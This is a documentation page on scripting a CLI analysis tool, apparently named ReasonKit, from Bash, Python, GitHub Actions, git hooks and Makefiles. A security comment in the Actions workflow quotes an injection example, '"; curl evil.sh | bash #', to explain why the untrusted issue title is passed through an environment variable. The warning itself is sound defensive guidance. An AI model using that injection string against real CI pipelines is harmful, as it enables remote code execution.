Scripting
Automate ReasonKit analysis in scripts and pipelines.
Bash Scripting
Basic Script
#!/bin/bash
# analyze.sh - Run analysis and save results
#
# Usage: ./analyze.sh "question" [output_file]
set -u -o pipefail

QUESTION="${1:-}"
OUTPUT_FILE="${2:-analysis.json}"

if [ -z "$QUESTION" ]; then
  # Usage/diagnostics belong on stderr so stdout stays clean for pipelines.
  echo "Usage: ./analyze.sh \"question\" [output_file]" >&2
  exit 1
fi

# Test the command directly rather than inspecting $? afterwards.
if rk think "$QUESTION" --format json > "$OUTPUT_FILE"; then
  echo "Analysis saved to $OUTPUT_FILE"
else
  # Don't leave an empty/partial file for downstream consumers to parse.
  rm -f -- "$OUTPUT_FILE"
  echo "Analysis failed" >&2
  exit 1
fi
Batch Analysis
#!/bin/bash
# batch_analyze.sh - Analyze multiple questions
set -u -o pipefail

QUESTIONS=(
  "Should we launch this feature?"
  "Is this pricing strategy sound?"
  "Should we hire this candidate?"
)

TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="analyses_${TIMESTAMP}"
mkdir -p "$OUTPUT_DIR" || exit 1

failures=0
for i in "${!QUESTIONS[@]}"; do
  echo "Analyzing question $((i+1))/${#QUESTIONS[@]}..."
  # Keep going when one question fails; report the tally at the end
  # instead of silently leaving empty JSON files behind.
  if ! rk think "${QUESTIONS[$i]}" --format json > "${OUTPUT_DIR}/analysis_${i}.json"; then
    echo "Question $((i+1)) failed" >&2
    rm -f -- "${OUTPUT_DIR}/analysis_${i}.json"
    failures=$((failures + 1))
  fi
done

echo "Analyses saved to $OUTPUT_DIR"
if [ "$failures" -gt 0 ]; then
  echo "$failures question(s) failed" >&2
  exit 1
fi
With Error Handling
#!/bin/bash
# robust_analyze.sh
set -e          # Exit on error
set -u          # Error on unset variables
set -o pipefail # A pipeline fails if any stage fails

#######################################
# Run `rk think` with retries.
# Arguments: $1 - question to analyze
# Outputs:   JSON analysis on stdout; retry notices on stderr
# Returns:   0 on success, 1 if every attempt failed
#######################################
analyze_with_retry() {
  local question="$1"
  local -r max_retries=3
  local retry=0

  while [ "$retry" -lt "$max_retries" ]; do
    if rk think "$question" --format json; then
      return 0
    fi
    retry=$((retry + 1))
    echo "Retry $retry/$max_retries..." >&2
    # Only pause when another attempt is coming; no sleep after the last one.
    if [ "$retry" -lt "$max_retries" ]; then
      sleep 2
    fi
  done
  return 1
}

analyze_with_retry "Should I take this job offer?" > result.json
Python Scripting
Basic Usage
#!/usr/bin/env python3
"""Run ReasonKit analysis from Python."""
import subprocess
import json


def analyze(question: str, profile: str = "balanced",
            timeout: float | None = None) -> dict:
    """Run ReasonKit analysis and return parsed results.

    Args:
        question: The question to analyze.
        profile: Analysis profile passed to ``rk-core`` (e.g. "quick",
            "balanced", "deep").
        timeout: Optional number of seconds to wait for the subprocess;
            ``None`` (the default) waits forever.

    Returns:
        The parsed JSON analysis.

    Raises:
        subprocess.CalledProcessError: If rk-core exits non-zero.
        subprocess.TimeoutExpired: If ``timeout`` elapses first.
        json.JSONDecodeError: If the tool's output is not valid JSON.
    """
    result = subprocess.run(
        ["rk-core", "think", question, "--profile", profile, "--format", "json"],
        capture_output=True,
        text=True,
        check=True,
        timeout=timeout,  # prevents hangs in automation (see --timeout tip)
    )
    return json.loads(result.stdout)


# Example usage
analysis = analyze("Should I start this business?", profile="deep")
print(f"Found {len(analysis['results']['gigathink']['perspectives'])} perspectives")
With Async Support
#!/usr/bin/env python3
"""Async ReasonKit analysis."""
import asyncio
import json


async def analyze_async(question: str, profile: str = "balanced") -> dict:
    """Run one analysis asynchronously.

    Raises:
        RuntimeError: If rk-core exits non-zero (stderr is included).
    """
    proc = await asyncio.create_subprocess_exec(
        "rk-core", "think", question,
        "--profile", profile,
        "--format", "json",
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE
    )
    stdout, stderr = await proc.communicate()
    if proc.returncode != 0:
        raise RuntimeError(f"Analysis failed: {stderr.decode()}")
    return json.loads(stdout.decode())


async def batch_analyze(questions: list[str],
                        max_concurrent: int | None = None) -> list[dict]:
    """Analyze multiple questions concurrently.

    Args:
        questions: The questions to analyze.
        max_concurrent: Optional cap on simultaneous rk-core processes;
            ``None`` (the default) launches them all at once.

    Returns:
        Results in the same order as ``questions``. The first failure
        propagates out of ``asyncio.gather``.
    """
    if max_concurrent is None:
        return await asyncio.gather(*(analyze_async(q) for q in questions))

    semaphore = asyncio.Semaphore(max_concurrent)

    async def limited(question: str) -> dict:
        # Bound the number of rk-core subprocesses alive at once.
        async with semaphore:
            return await analyze_async(question)

    return await asyncio.gather(*(limited(q) for q in questions))


# Example usage
async def main():
    questions = [
        "Should we expand to Europe?",
        "Is this partnership beneficial?",
        "Should we raise prices?"
    ]
    results = await batch_analyze(questions)
    for q, r in zip(questions, results):
        print(f"\n{q}")
        print(f"Synthesis: {r['synthesis'][:100]}...")

asyncio.run(main())
Extracting Insights
#!/usr/bin/env python3
"""Extract specific insights from analysis."""
import subprocess
import json


def _run_tool(tool: str, text: str) -> dict:
    """Run an rk-core tool on ``text`` and return its parsed JSON output.

    Raises:
        subprocess.CalledProcessError: If the tool exits non-zero.
        json.JSONDecodeError: If the output is not valid JSON.
    """
    result = subprocess.run(
        ["rk-core", tool, text, "--format", "json"],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(result.stdout)


def get_uncomfortable_truths(question: str) -> list[str]:
    """Extract just the uncomfortable truths."""
    return _run_tool("brutalhonesty", question).get("uncomfortable_truths", [])


def get_logical_flaws(argument: str) -> list[dict]:
    """Extract logical flaws from an argument."""
    return _run_tool("laserlogic", argument).get("flaws", [])


# Example usage
truths = get_uncomfortable_truths("I'm going to start a YouTube channel")
for truth in truths:
    print(f"- {truth}")
CI/CD Integration
GitHub Actions
# .github/workflows/decision-analysis.yml
name: Decision Analysis
on:
  issues:
    types: [labeled]
jobs:
  analyze:
    if: github.event.label.name == 'needs-analysis'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Install ReasonKit
        run: cargo install reasonkit
      - name: Run Analysis
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
          # SECURITY: pass the untrusted issue title via env, not ${{ }}
          # interpolation inside `run:` — a crafted title like
          # `"; curl evil.sh | bash #` would otherwise execute as shell code.
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: |
          rk think "$ISSUE_TITLE" \
            --profile balanced \
            --format markdown > analysis.md
      - name: Comment on Issue
        uses: actions/github-script@v6
        with:
          script: |
            const fs = require('fs');
            const analysis = fs.readFileSync('analysis.md', 'utf8');
            github.rest.issues.createComment({
              issue_number: context.issue.number,
              owner: context.repo.owner,
              repo: context.repo.repo,
              body: analysis
            });
Pre-Commit Hook
#!/bin/bash
# .git/hooks/commit-msg
# Analyze commit messages for quality.
#
# NOTE: git passes the message file path as $1 only to the *commit-msg*
# hook — pre-commit receives no arguments, so this must be installed as
# .git/hooks/commit-msg (the original "pre-commit" label was wrong).

MSG=$(cat "$1")

if [[ ${#MSG} -gt 100 ]]; then
  echo "Running commit message analysis..."
  rk laserlogic "Commit message: $MSG" --format pretty
  # Hooks don't run with the terminal on stdin; rebind it so `read` works.
  exec < /dev/tty
  read -p "Continue with commit? (y/n) " -n 1 -r
  echo
  if [[ ! $REPLY =~ ^[Yy]$ ]]; then
    exit 1
  fi
fi
Makefile Integration
# Makefile
.PHONY: analyze analyze-deep analyze-all

analyze:
	@rk think "$(Q)" --profile balanced

analyze-deep:
	@rk think "$(Q)" --profile deep

# NOTE: make word-splits $(QUESTIONS) on whitespace, so each entry must be a
# single word; use the shell scripts above for multi-word questions.
analyze-all:
	@for q in $(QUESTIONS); do \
		echo "Analyzing: $$q"; \
		rk think "$$q" --format json > "analysis_$$(echo "$$q" | md5sum | cut -c1-8).json"; \
	done

# Usage: make analyze Q="Should we refactor this module?"
Tips for Scripting
- Always use JSON format for programmatic processing
- Handle errors - check exit codes and stderr
- Set timeouts - use `--timeout` to prevent hangs
- Cache results - analysis is deterministic for same inputs
- Use appropriate profiles - quick for automation, deep for important decisions